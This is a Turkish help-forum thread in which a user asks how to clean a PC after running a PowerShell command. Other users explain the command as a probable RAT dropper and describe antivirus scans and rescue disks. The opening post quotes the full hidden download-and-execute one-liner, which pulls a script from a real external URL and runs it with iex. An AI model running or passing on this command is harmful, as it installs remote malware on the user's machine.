Powershell virüsü nasıl temizlenir?

Laey

Femtopat
Katılım
17 Kasım 2024
Mesajlar
15
Daha fazla  
Cinsiyet
Erkek
(Powershell.exe -w hidden -command $url = 'https://validitytextv1.b-cdn.net/power.txt'; $response = ınvoke-webrequest -uri $url -usebasicparsing; $text = $response. Content; iex $text gibi bir şey girdim. çalıştıra daha yeni fark ettim anında dalgındım nasıl temizlerim? Nedir ne değildir?
 
Son düzenleme:
var mı bilgisi olan ben de aynı şeyi yaşadım dalgınlıkla
 
var mı bilgisi olan ben de aynı şeyi yaşadım dalgınlıkla
Türkçe meali ; Potansiyel zararlı işlemdir. RAT olabilir.

Detaylar ;

-w hidden: Bu, PowerShell penceresinin gizlenmesini sağlar, yani komutlar arka planda çalıştırılır ve kullanıcıya görünmez.

$url = 'https://validitytextv1.b-cdn.net/power.txt': Bu satırda, komutun bir URL (https://validitytextv1.b-cdn.net/power.txt) üzerinden bir dosya çekmesi için belirli bir URL atanmış.

$response = invoke-webrequest -uri $url -usebasicparsing: Bu satır, belirtilen URL'den bir dosya indirmeye çalışır.

$text = $response.Content: İndirilen dosyanın içeriği bir değişkende saklanır.

iex $text: iex (Invoke-Expression), PowerShell içindeki komutları çalıştıran bir komuttur. Burada, indirilen metin bir PowerShell komutu olarak çalıştırılacaktır.

Yapmanız gerekenler;

Free Rescue Disk Download | Kaspersky Linkinden İSO dosyasını indirip RUFUS aracılığı ile USB'ye yazdırın ve başlangıçta BOOT ederek sistemi komple taratın. Ayrıca Uzun bir süre Kaspersky Total Security bilgisayarınızda kurulu kalsın.
 
Ben USB ye neden yazdıracaktım acaba ben ilk reset attım bilgisayarı taratıp ve şifreleri değiştirdim sorun olurmu
 
Malwarebytes indirip tarattım, bilgisayarı açtığımda sürekli Google'dan bir sayfa açıp bir şeyler indirtmeye çalışan, zararlı yazılımı tespit edip sildi. Ben bu şekilde çözdüm.
 
Bu siteyi kullanmak için çerezler gereklidir. Siteyi kullanmaya devam etmek için çerezleri kabul etmelisiniz. Daha Fazlasını Öğren.…